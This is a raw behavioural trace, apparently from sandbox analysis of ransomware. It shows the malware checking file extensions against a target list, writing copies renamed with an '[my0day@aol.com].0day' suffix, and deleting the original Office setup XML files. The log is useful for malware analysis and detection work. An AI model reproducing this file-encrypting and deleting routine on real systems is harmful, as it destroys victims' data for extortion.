returned 4 [0037.187] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.187] lstrlenW (lpString=".zip") returned 4 [0037.187] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.187] lstrlenW (lpString=".rar") returned 4 [0037.187] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.187] lstrlenW (lpString=".bz2") returned 4 [0037.187] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.187] lstrlenW (lpString=".7z") returned 3 [0037.187] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.188] lstrlenW (lpString=".dbf") returned 4 [0037.188] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.188] lstrlenW (lpString=".1cd") returned 4 [0037.188] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.188] lstrlenW (lpString=".jpg") returned 4 [0037.188] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.188] lstrlenW (lpString=".doc") returned 4 [0037.188] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString=".docx") returned 5 [0037.188] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.188] lstrlenW (lpString=".pdf") returned 4 [0037.188] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString=".xls") returned 4 [0037.188] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString=".xlsx") returned 5 [0037.188] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.188] lstrlenW (lpString=".ppt") returned 4 [0037.188] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.188] lstrlenW (lpString=".zip") returned 4 [0037.188] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.188] lstrlenW (lpString=".rar") returned 4 [0037.188] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString=".bz2") returned 4 [0037.188] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.188] lstrlenW (lpString=".7z") returned 3 [0037.188] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.188] lstrlenW (lpString=".dbf") returned 4 [0037.188] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.189] lstrlenW (lpString=".1cd") returned 4 [0037.189] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.189] lstrlenW (lpString=".jpg") returned 4 [0037.189] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.189] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0037.189] lstrlenW (lpString="AccessMUISet.XML") returned 16 [0037.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.190] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=819) returned 1 [0037.190] CloseHandle (hObject=0x170) returned 1 [0037.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 0x20 [0037.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.190] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.190] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.191] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.191] GetLastError () returned 0x0 [0037.191] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x333, lpOverlapped=0x0) returned 1 [0037.193] WriteFile (in: hFile=0x1bc, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x340, lpOverlapped=0x0) returned 1 [0037.194] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.194] WriteFile (in: hFile=0x1bc, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0037.194] SetEndOfFile (hFile=0x1bc) returned 1 [0037.194] CloseHandle (hObject=0x1bc) returned 1 [0037.195] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.195] SetEndOfFile (hFile=0x170) returned 1 [0037.195] CloseHandle (hObject=0x170) returned 1 [0037.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0037.196] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 1 [0037.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.196] lstrlenW (lpString=".doc") returned 4 [0037.196] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.196] lstrlenW (lpString=".docx") returned 5 [0037.196] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0037.196] lstrlenW (lpString=".pdf") returned 4 [0037.196] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.196] lstrlenW (lpString=".xls") returned 4 [0037.196] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.196] lstrlenW (lpString=".xlsx") returned 5 [0037.196] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0037.196] lstrlenW (lpString=".ppt") returned 4 [0037.196] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.196] lstrlenW (lpString=".zip") returned 4 [0037.196] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.196] lstrlenW (lpString=".rar") returned 4 [0037.196] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.196] lstrlenW (lpString=".bz2") returned 4 [0037.196] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.196] lstrlenW (lpString=".7z") returned 3 [0037.196] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.196] lstrlenW (lpString=".dbf") returned 4 [0037.196] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.197] lstrlenW (lpString=".1cd") returned 4 [0037.197] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.197] lstrlenW (lpString=".jpg") returned 4 [0037.197] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.197] lstrlenW (lpString=".doc") returned 4 [0037.197] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString=".docx") returned 5 [0037.197] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0037.197] lstrlenW (lpString=".pdf") returned 4 [0037.197] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString=".xls") returned 4 [0037.197] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString=".xlsx") returned 5 [0037.197] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0037.197] lstrlenW (lpString=".ppt") returned 4 [0037.197] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.197] lstrlenW (lpString=".zip") returned 4 [0037.197] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.197] lstrlenW (lpString=".rar") returned 4 [0037.197] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString=".bz2") returned 4 [0037.197] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString=".7z") returned 3 [0037.197] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.197] lstrlenW (lpString=".dbf") returned 4 [0037.197] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.197] lstrlenW (lpString=".1cd") returned 4 [0037.197] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.198] lstrlenW (lpString=".jpg") returned 4 [0037.198] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.198] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0037.198] lstrlenW (lpString="SETUP.XML") returned 9 [0037.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.199] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2624) returned 1 [0037.199] CloseHandle (hObject=0x170) returned 1 [0037.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 0x20 [0037.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.199] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.199] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.202] GetLastError () returned 0x0 [0037.202] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xa40, lpOverlapped=0x0) returned 1 [0037.203] WriteFile (in: hFile=0x1bc, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0037.204] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.204] WriteFile (in: hFile=0x1bc, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.689] SetEndOfFile (hFile=0x1bc) returned 1 [0037.689] CloseHandle (hObject=0x1bc) returned 1 [0037.690] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.690] SetEndOfFile (hFile=0x170) returned 1 [0037.852] CloseHandle (hObject=0x170) returned 1 [0037.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0037.852] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 1 [0037.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.852] lstrlenW (lpString=".doc") returned 4 [0037.852] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.852] lstrlenW (lpString=".docx") returned 5 [0037.852] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.852] lstrlenW (lpString=".pdf") returned 4 [0037.852] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.852] lstrlenW (lpString=".xls") returned 4 [0037.852] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.852] lstrlenW (lpString=".xlsx") returned 5 [0037.852] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.853] lstrlenW (lpString=".ppt") returned 4 [0037.853] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.853] lstrlenW (lpString=".zip") returned 4 [0037.853] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.853] lstrlenW (lpString=".rar") returned 4 [0037.853] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString=".bz2") returned 4 [0037.853] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString=".7z") returned 3 [0037.853] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.853] lstrlenW (lpString=".dbf") returned 4 [0037.853] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.853] lstrlenW (lpString=".1cd") returned 4 [0037.853] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.853] lstrlenW (lpString=".jpg") returned 4 [0037.853] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.853] lstrlenW (lpString=".doc") returned 4 [0037.853] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString=".docx") returned 5 [0037.853] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.853] lstrlenW (lpString=".pdf") returned 4 [0037.853] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString=".xls") returned 4 [0037.853] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.853] lstrlenW (lpString=".xlsx") returned 5 [0037.853] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.853] lstrlenW (lpString=".ppt") returned 4 [0037.854] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.854] lstrlenW (lpString=".zip") returned 4 [0037.854] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.854] lstrlenW (lpString=".rar") returned 4 [0037.854] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.854] lstrlenW (lpString=".bz2") returned 4 [0037.854] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.854] lstrlenW (lpString=".7z") returned 3 [0037.854] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.854] lstrlenW (lpString=".dbf") returned 4 [0037.854] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.854] lstrlenW (lpString=".1cd") returned 4 [0037.854] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.854] lstrlenW (lpString=".jpg") returned 4 [0037.854] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.854] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0037.854] lstrlenW (lpString="GrooveMUI.XML") returned 13 [0037.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.855] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=913) returned 1 [0037.855] CloseHandle (hObject=0x170) returned 1 [0037.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 0x20 [0037.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.855] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.855] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0038.995] GetLastError () returned 0x0 [0038.995] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x391, lpOverlapped=0x0) returned 1 [0039.128] WriteFile (in: hFile=0x1f8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0039.129] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.129] WriteFile (in: hFile=0x1f8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0039.129] SetEndOfFile (hFile=0x1f8) returned 1 [0039.130] CloseHandle (hObject=0x1f8) returned 1 [0039.130] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.130] SetEndOfFile (hFile=0x170) returned 1 [0039.131] CloseHandle (hObject=0x170) returned 1 [0039.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 